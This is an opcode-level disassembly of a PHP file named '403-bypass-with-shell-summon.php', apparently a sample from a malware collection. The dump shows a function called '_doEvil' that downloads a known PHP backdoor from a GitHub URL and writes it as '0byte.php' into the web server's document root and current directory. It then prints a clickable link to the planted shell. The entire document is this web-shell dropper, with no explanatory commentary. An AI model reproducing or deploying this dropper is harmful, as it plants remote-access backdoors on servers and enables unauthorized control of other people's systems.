|filename:|/root/samples/403-bypass-with-shell-summon.php
|functionname:|(null)
|numberofops:|8
|compiledvars:|!0=$source,|!1=$name
|line|#*|||op|fetch|ext|return|operands
|6|0|E>|ASSIGN||||!0|,|'https%3A%2F%2Fraw.githubusercontent.com%2Fzerobyte-id%2FPHP-Backdoor%2Fmaster%2F0byt3m1n1%2F0byt3m1n1.php'|
|7|1||ASSIGN||||!1|,|'0byte.php'|
|41|2||INIT_FCALL||||'_doevil'|
||3||SEND_VAR||||!1|
||4||SEND_VAR||||!0|
||5||DO_FCALL||0||
|42|6||ECHO||||'++%0A'|
|43|7|>|RETURN||||1|
|
|Function_doevil:
|filename:|/root/samples/403-bypass-with-shell-summon.php
|functionname:|_doEvil
|numberofops:|116
|compiledvars:|!0=$name,|!1=$file,|!2=$filename,|!3=$getFile,|!4=$rootPath,|!5=$toRootFopen,|!6=$toRootExec,|!7=$rootShellUrl,|!8=$realPath,|!9=$toRealFopen,|!10=$toRealExec,|!11=$realShellUrl
|line|#*|||op|fetch|ext|return|operands
|9|0|E>|RECV|||!0|
||1||RECV|||!1|
|10|2||ASSIGN||||!2|,|!0|
|11|3||INIT_FCALL||||'file_get_contents'|
||4||SEND_VAR||||!1|
||5||DO_ICALL|||$13|
||6||ASSIGN||||!3|,|$13|
|12|7||FETCH_R|global||~15|'_SERVER'|
||8||FETCH_DIM_R|||~16|~15|,|'DOCUMENT_ROOT'|
||9||CONCAT|||~17|~16|,|'%2F'|
||10||ASSIGN||||!4|,|~17|
|13|11||INIT_FCALL||||'fopen'|
||12||ROPE_INIT||3|~20|!4|
||13||ROPE_ADD||1|~20|~20|,|'%2F'|
||14||ROPE_END||2|~19|~20|,|!2|
||15||SEND_VAL||||~19|
||16||SEND_VAL||||'w'|
||17||DO_ICALL|||$22|
||18||ASSIGN||||!5|,|$22|
|14|19||INIT_FCALL||||'fwrite'|
||20||SEND_VAR||||!5|
||21||SEND_VAR||||!3|
||22||DO_ICALL|||$24|
||23||ASSIGN||||!6|,|$24|
|15|24||FETCH_R|global||~26|'_SERVER'|
||25||FETCH_DIM_R|||~27|~26|,|'HTTPS'|
||26|>|JMPZ||||~27|,|->29|
||27|>|QM_ASSIGN|||~28|'https'|
||28|>|JMP||||->38|
||29|>|NOP||||
||30||FETCH_R|global||~29|'_SERVER'|
||31||FETCH_DIM_R|||~30|~29|,|'HTTP_HOST'|
||32||FAST_CONCAT|||~31|'%3A%2F%2F'|,|~30|
||33||CONCAT|||~32|'http'|,|~31|
||34||NOP||||
||35||FAST_CONCAT|||~33|'%2F'|,|!2|
||36||CONCAT|||~34|~32|,|~33|
||37||QM_ASSIGN|||~28|~34|
||38|>|ASSIGN||||!7|,|~28|
|16|39||INIT_FCALL||||'getcwd'|
||40||DO_ICALL|||$36|
||41||CONCAT|||~37|$36|,|'%2F'|
||42||ASSIGN||||!8|,|~37|
|17|43||INIT_FCALL||||'fopen'|
||44||ROPE_INIT||3|~40|!8|
||45||ROPE_ADD||1|~40|~40|,|'%2F'|
||46||ROPE_END||2|~39|~40|,|!2|
||47||SEND_VAL||||~39|
||48||SEND_VAL||||'w'|
||49||DO_ICALL|||$42|
||50||ASSIGN||||!9|,|$42|
|18|51||INIT_FCALL||||'fwrite'|
||52||SEND_VAR||||!9|
||53||SEND_VAR||||!3|
||54||DO_ICALL|||$44|
||55||ASSIGN||||!10|,|$44|
|19|56||FETCH_R|global||~46|'_SERVER'|
||57||FETCH_DIM_R|||~47|~46|,|'HTTPS'|
||58|>|JMPZ||||~47|,|->61|
||59|>|QM_ASSIGN|||~48|'https'|
||60|>|JMP||||->77|
||61|>|NOP||||
||62||FETCH_R|global||~49|'_SERVER'|
||63||FETCH_DIM_R|||~50|~49|,|'HTTP_HOST'|
||64||FAST_CONCAT|||~51|'%3A%2F%2F'|,|~50|
||65||CONCAT|||~52|'http'|,|~51|
||66||INIT_FCALL||||'dirname'|
||67||FETCH_CONSTANT|||~54|'REQUEST_URI'|
||68||FETCH_R|global||~53|'_SERVER'|
||69||FETCH_DIM_R|||~55|~53|,|~54|
||70||SEND_VAL||||~55|
||71||DO_ICALL|||$56|
||72||CONCAT|||~57|~52|,|$56|
||73||NOP||||
||74||FAST_CONCAT|||~58|'%2F'|,|!2|
||75||CONCAT|||~59|~57|,|~58|
||76||QM_ASSIGN|||~48|~59|
||77|>|ASSIGN||||!11|,|~48|
|20|78||ECHO||||'%3Ccenter%3E'|
|21|79|>|JMPZ||||!6|,|->99|
|22|80|>|INIT_FCALL||||'file_exists'|
||81||CAST||6|~61|!2|
||82||CONCAT|||~62|!4|,|~61|
||83||SEND_VAL||||~62|
||84||DO_ICALL|||$63|
||85|>|JMPZ||||$63|,|->93|
|23|86|>|ROPE_INIT||5|~65|'%3Ch1%3E%3Cfont+color%3D%22%2300FF00%22%3E%5BOK%21%5D+%3Ca+href%3D%22'|
||87||ROPE_ADD||1|~65|~65|,|!7|
||88||ROPE_ADD||2|~65|~65|,|'%22+target%3D%22_blank%22%3E'|
||89||ROPE_ADD||3|~65|~65|,|!7|
||90||ROPE_END||4|~64|~65|,|'%3C%2Fa%3E%3C%2Ffont%3E%3C%2Fh1%3E'|
||91||ECHO||||~64|
||92|>|JMP||||->98|
|26|93|>|ROPE_INIT||4|~69|'%3Ch1%3E%3Cfont+color%3D%22red%22%3E'|
||94||ROPE_ADD||1|~69|~69|,|!4|
||95||ROPE_ADD||2|~69|~69|,|!2|
||96||ROPE_END||3|~68|~69|,|'%3Cbr%3EDoesn%27t+exist%21%3C%2Ffont%3ETry+with+another+method%21%3C%2Fh1%3E'|
||97||ECHO||||~68|
||98|>>|JMP||||->114|
|30|99|>>|JMPZ||||!10|,|->114|
|31|100|>|INIT_FCALL||||'file_exists'|
||101||CAST||6|~71|!2|
||102||CONCAT|||~72|!8|,|~71|
||103||SEND_VAL||||~72|
||104||DO_ICALL|||$73|
||105|>|JMPZ||||$73|,|->113|
|32|106|>|ROPE_INIT||5|~75|'%3Ch1%3E%3Cfont+color%3D%22%2300FF00%22%3E%5BOK%21%5D+%3Ca+href%3D%22'|
||107||ROPE_ADD||1|~75|~75|,|!11|
||108||ROPE_ADD||2|~75|~75|,|'%22+target%3D%22_blank%22%3E'|
||109||ROPE_ADD||3|~75|~75|,|!11|
||110||ROPE_END||4|~74|~75|,|'%3C%2Fa%3E%3C%2Ffont%3E%3C%2Fh1%3E'|
||111||ECHO||||~74|
||112|>|JMP||||->114|
|35|113|>|ECHO||||'%3Ch1%3E%3Cfont+color%3D%22red%22%3EFAILED%21%3C%2Ffont%3E%3C%2Fh1%3E'|
|39|114|>|ECHO||||'%3C%2Fcenter%3E'|
|40|115|>|RETURN||||null|
|
|Endoffunction_doevil

